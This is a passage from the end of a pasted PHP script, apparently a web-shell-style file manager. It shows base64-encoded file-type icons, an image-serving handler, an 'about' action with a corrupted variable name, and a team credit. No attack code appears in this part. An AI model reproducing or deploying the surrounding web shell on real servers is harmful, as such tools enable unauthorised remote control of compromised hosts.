  2758. "AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
  2759. "EzWCgwARADs=",
  2760. "ext_wri"=>
  2761. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  2762. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  2763. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  2764. "ext_xml"=>
  2765. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  2766. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2767. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  2768. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  2769. "IQA7",
  2770. "ext_xsl"=>
  2771. "R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
  2772. "gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2773. "AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
  2774. "SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
  2775. "dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==",
  2776. "1"=>
  2777. "R0lGODlhGAASAPZKAAICAgISCgI6EgJqFj6aIkyiJhqWIg6WIgJ6GkKeIk6mJgJSFgJOFAIyEgJe".
  2778. "FjaKHkKSHkKOHgI+EiJyGjqCGjaCGj6KImKqQmauSgJGEipyFip2Gi52GgJWFgIqDjZ+HiJ+LgJW".
  2779. "GgJKEhBQGSZuHiJuFiJqFgImDlrOQiJuGiZ2HAJaFyaCHDKSHi5+GhJmFh5iFxpiFl6iQhp6Li6O".
  2780. "HkLCKjqqJjKCGhZuFhpaFhZaFgJeGjaqJj6yJjJ+Gi56GgJSEgJmGhZOFiJaGiZmIi52KkKKNlKe".
  2781. "PmKySnLGUnrWWip6GjaaIjKOHgJyGgIWCgoeCgIuDgJiFh5yFhJaFg5qFgp2GgqCHgJmHgJuGiZy".
  2782. "FiJmFiKCHiaOHg5OElqaQiqGLgJ2GipyGiZqGiJmGip+HiqOIi6WJhImFgJ+HhiCGiJ6GiJqGh5m".
  2783. "GiJ2GiaKHgImCkKONh52GhZyFhZ2GhZ+GhaGHlaWQmKmRl6iRgIiCwIeCgIaCgI2EgAAAAAAACwA".
  2784. "AAAAGAASAAAH/4AAAQIDBAUGAYiKiYwHjQGDCAkKBQsBlpiXmpkMAQ0ODxAREKSlpqemEhMUFa2u".
  2785. "rhYXGLO0tRkaGxwdHhm5uR8YICELGcUZIiIMDCMkJSYnKB4lJSkqGB0iKywtLi/FycswMTELJxkw".
  2786. "6DIzDCs0NTY3GzgZDAsdIzk5Ojr5/Rg7DFTw6OHjBwcNIoA4CDJCyBAiRYwcQZJECYYVC5YwafLD".
  2787. "4AaFA5yMeALlRBQJIjpIGfBvxZQbBTds0EClipUrIwJE0RnAA6QAGLBIyaKFg68tMCZw6ZLTSwAR".
  2788. "ATL8/AImS5gJYjaIGUOGRBkzZ3L+HBsADYY0atakYNOGDBs3LEfemMm5c6dPOJDMxuEiB4ffOXTq".
  2789. "qLHT9GnUwxLK3sGAJ4/jPHhoiSVLufJPujzvBsCLV08Az3sC8BEdoDBUqVITJ+7jqbXmQAA7",
  2790. "2"=>
  2791. "R0lGODlhPwASAOUDAFmwLFGkJUKQHmauSgBNEgBOEgBYFgBXFgBlGQBkGQByGgBxGgBzGgqAHQCB".
  2792. "HQ2BHQqCHRCCHSWNHySOHyWPICePICuXJSyWJSmXJSmPICeQISaPIBaFHQAQCgAZCgAXCgAWCgAU".
  2793. "CgASCgAlCgAhCgAfCgAbCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2794. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAPwASAAAG40CAcEgsGo/IpBIZ".
  2795. "aDqf0Kh0Sq1OBdisdsvter9g72BMLpvP6LR6nS643/C4fE6v2+/4vH4vNxz+B35/BoSCgYWAh4SJ".
  2796. "iIqLgYyJkokIlZaXmJmam5ydmwqgoaKjpKWmp6imEA4QrayrrbGys6+ztreuuLMPEBESv8DBwsPE".
  2797. "xcbHwxobFhfNF8zPztHT09DN0NbZ0tbU0s7QGeHhGuLi5OXo6eYa5+ru7xkbHPP09fb3+Pn6+/ls".
  2798. "/v8A/4kYSLCgwYMIEypcmNCDCBAPIzKcSLGiwREiSIgoIcKhQ4gQLYocKSIIADs=",
  2799. "3"=>
  2800. "R0lGODlhBgASAOUDAFmwLFGkJUKQHmauSmGoQz2IIDeCGwBUFwBZGiB/LjR+Hyt2GQBOEgBPFABV".
  2801. "Fyl0HgBXFgBYFwBbFwBjGTCEMFmiQQBmFwBpFwBtGQBzGhKCIGWtSgB2GwB6HQB/HQCCHRuIHwCE".
  2802. "HRCGHRKJHRKLHR2PICWPICSPIC2XJCyWJSmXJCmWJCmaJUOMO1iYQimPICyPIhImFB+IHySOIUGK".
  2803. "OAAQCliXQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAABgASAAAGSkCAcBgoGgXI5GBA".
  2804. "KBgMEERioFgwGA3I4AGRSCaUiuWCyWgGnI7nAxqERKNRaTAz2VGDFEvfcsH+MAMxMjM0gjVLNjE1".
  2805. "jI2Oj49BADs=",
  2806. "4"=>
  2807. "R0lGODlhQgASANQJAFmwLFGkJUKQHjeCGyt2GSFsFx1gFhtZFIrdY4zdZIndYobdYoPdYILdX4Dd".
  2808. "X3/dXgBvGQBuGQBwGQAQCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAA".
  2809. "QgASAAAFlSAgjmRpnmiqrkHrvnAsz3RtC3iu73zv/8DgYEgsGo/IpHLJJDif0Kh0Sq1ar4Wsdsvt".
  2810. "er/gsNhALpvP6LR6zW4f3vC4fE6v2+94hB6R6Pv/fnoJeguFhgiFDIqKDY2OjQ+GC3uCgJYRmJma".
  2811. "m5ydnpgSn6KeE6Wmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsMhADs=",
  2812. "5"=>
  2813. "R0lGODlhIQASAPYtAFmwLBqWIAASCg2VIEugJD6YIABqFwA6EAAAAFGkJQBSFABOFE2iJE6lJUKd".
  2814. "IgB5G0KQHkGPHTaJHQBdFgAzEDeCGzuBGiBxGQA+ECt2GQAtDQBFEi53GSpwFyFsFwAnDVrNQgAq".
  2815. "DSFqFyVsFxBQGR5hFhtgFhtZFBdZFIDdX3/dXobdYondYozdZInaYofYYYPTXn3MW3jEV3G6UWix".
  2816. "TF+lRVWYP0qLODx7LjNvKShhIRlYHRJQFxRKFA1GEgBuGQBlFwBaFABUFAAzDQ0dCgoZCgoWCgAW".
  2817. "CgAaCgAeCgAiCgAlCgA3EABKEg1OEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2818. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2819. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA".
  2820. "AAAAIQASAAAH/4AAgoOCAQKGiIeKA4sCAAQFBgcCCAmWl5YKApqcm56dCwIJDA0OD5MQqaqrrK2u".
  2821. "ERASExQVtba3uLm6tRYXGBnAwcLDxMMKGhscGR0bHs7P0NHS0R8gISIeIyQl3N3e3+DfCh8bJtwk".
  2822. "J+nq6+zt7ijwJiQpKSor9yss+votLSwuL2DEkDGDRg0bN3Dk0LGDRw8fJH5InEixokQDQCYEEbJg".
  2823. "A4YhGj4QKWJEAAkBAo6kXIlEQMuWSQQokSlgSc2bIQRo0GnypYCYM23azElBQFEmAjAkFbCBqYAm".
  2824. "ApyYREm1qtWrWK2eXKlSpU+YNIPeHMpzJwmfQMcKIGpUAFKlSiObNoUqdWvWu3ipbu3K0qXftGKF".
  2825. "ri3b8y9NwWyPLo3rlK7JQAA7",
  2826. "font"=>
  2827. "/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAACgAA/+4ADkFkb2JlAGTAAAAAAf/b".
  2828. "AIQAFBAQGRIZJxcXJzImHyYyLiYmJiYuPjU1NTU1PkRBQUFBQUFERERERERERERERERERERERERE".
  2829. "RERERERERERERAEVGRkgHCAmGBgmNiYgJjZENisrNkREREI1QkRERERERERERERERERERERERERE".
  2830. "RERERERERERERERERERERERE/8AAEQgAlACUAwEiAAIRAQMRAf/EAHAAAAMBAQEAAAAAAAAAAAAA".
  2831. "AAACAwEEBgEBAAAAAAAAAAAAAAAAAAAAABAAAQMDAwMCBQIFBAMAAAAAAQAR4iGhAjESA0FhcVEi".
  2832. "8IGxwRPhwvFSgvIE0TJCYnKSohEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8A85yO+rfO".
  2833. "SMMvTp3kjIkmvyrJPjk3WnmSCZyJLuPj+pM2QZ+veSTLlr28yVMeQkit5IMz4wA4y+P/AGUiW63k".
  2834. "unPMnWnx/wCS5ssvT6yQU489oZ9e8kFvW8k/DmG/WSjvO7W8kDbiOr/OSMcq0+slu7veSwcvobyQ".
  2835. "Bc6m8kbm63kjLItreSmM263kguSRi7hvMlIE7daeZLTyk47fvJZv9rPeSB+PlFHN5JuUhwxvJQxI".
  2836. "epvJVJALfeSBcvR7yWYgkt95KmTNreSXHLIGhf5yQY3Tr5khbuL9/MkIH5eQO7v85KQzJ63ktJ9r".
  2837. "veSUZt1vJBmRY1N5JvyBh27ySnJ6veSelK3kgtnlUg0Px3UTlVwbyVTlj0L/AB5UX73kgph7tcm+".
  2838. "clI5B6GnmSfAEuX7ayUiWOt5IH30d7yWYZN1vJLuej3kqYgnreSBs83x1vJSf1N5J26veSXI97yQ".
  2839. "dGO3Z8vWSRxs1r5kjEPjreSwYvjue8kExUO95LTyHqbyW8ebGpvJNzZuQxvJAm/veSrxkvreSgcj".
  2840. "63kqcRJOtPMkGv7nfr6yQt7PeSEGZ5FyD9ZJMcvU3kqZkklzeSHp7vrJBPLIPreSCSCK3kinQ3km".
  2841. "3gsB9ZIH5c2AANR/2/UKb97yVs8AA73ko5HveSCmPLtDfeSi7nW8lTHHdiwNX9ZKbt1f5yQGXq95".
  2842. "KoY1fp6yU3y9byVMX13afH8yBeTJgz3ksGYNHvJGWXTL6yWBh1vJBYPtcZfJ5KR5CcWGnmSc8hAH".
  2843. "j1kp45tT7yQbhkOpp5kmzOIIA+slmIchzeSblYEMbyQKW9byTY57TreSzIhqGvmSkSfW8kFvyV1v".
  2844. "JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY".
  2845. "f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg".
  2846. "9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3".
  2847. "HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN".
  2848. "5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf".
  2849. "8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx".
  2850. "yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY".
  2851. "ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH".
  2852. "K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/".
  2853. "AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm".
  2854. "S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ".
  2855. "P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre".
  2856. "Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e".
  2857. "8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d".
  2858. "/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd".
  2859. "7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM".
  2860. "u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95".
  2861. "KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc".
  2862. "urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7".
  2863. "3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB".
  2864. "B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn".
  2865. "5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO".
  2866. "MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U".
  2867. "hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc".
  2868. "/wDchCA97/3IQhB//9k=",
  2869. "pdisk"=>
  2870. "R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK".
  2871. "yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX".
  2872. "V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O".
  2873. "jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp".
  2874. "qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N".
  2875. "Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2876. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
  2877. "BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C".
  2878. "BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF".
  2879. "IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7",
  2880. "odel"=>
  2881. "R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq".
  2882. "SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs="
  2883.  
  2884. );
  2885. $imgequals = array(
  2886. "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  2887. "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
  2888. "ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
  2889. );
  2890.  ksort($arrimg);
  2891.  if (!$getall)
  2892.  {
  2893.   header("Content-type: image/gif");
  2894.   header("Cache-control: public");
  2895.   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  2896.   header("Cache-control: max-age=".(60*60*24*7));
  2897.   header("Last-Modified: ".date("r",filemtime(__FILE__)));
  2898.   foreach($imgequals as $k=>$v)
  2899.   {
  2900. if (in_array($img,$v)) {$img = $k;}
  2901.   }
  2902.   if (empty($arrimg[$img])) {$img = "small_unk";}
  2903.   if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  2904.   echo base64_decode($arrimg[$img]);
  2905.  }
  2906.  else
  2907.  {
  2908.   echo  "<center>";
  2909.   $k = array_keys($arrimg);
  2910.   foreach ($k as $u)
  2911.   {
  2912. echo $u.":<img src=\"".$sul."act=img&img=".$u."\" border=\"1\"><br>";
  2913.   }
  2914.   echo "</center>";
  2915.  }
  2916.  exit;
  2917. }
  2918. if ($act == "about")
  2919. {
  2920.  $d�ta = "Any ****** copyrights and copylefts";
  2921.  echo $data;
  2922. }
  2923.  
  2924. $microtime = round(getmicrotime()-$starttime,4);
  2925.  
  2926. ?>
  2927. <? // [CT] TEAM SCRIPTING - RODNOC ?>
Add Comment
Please, Sign In to add comment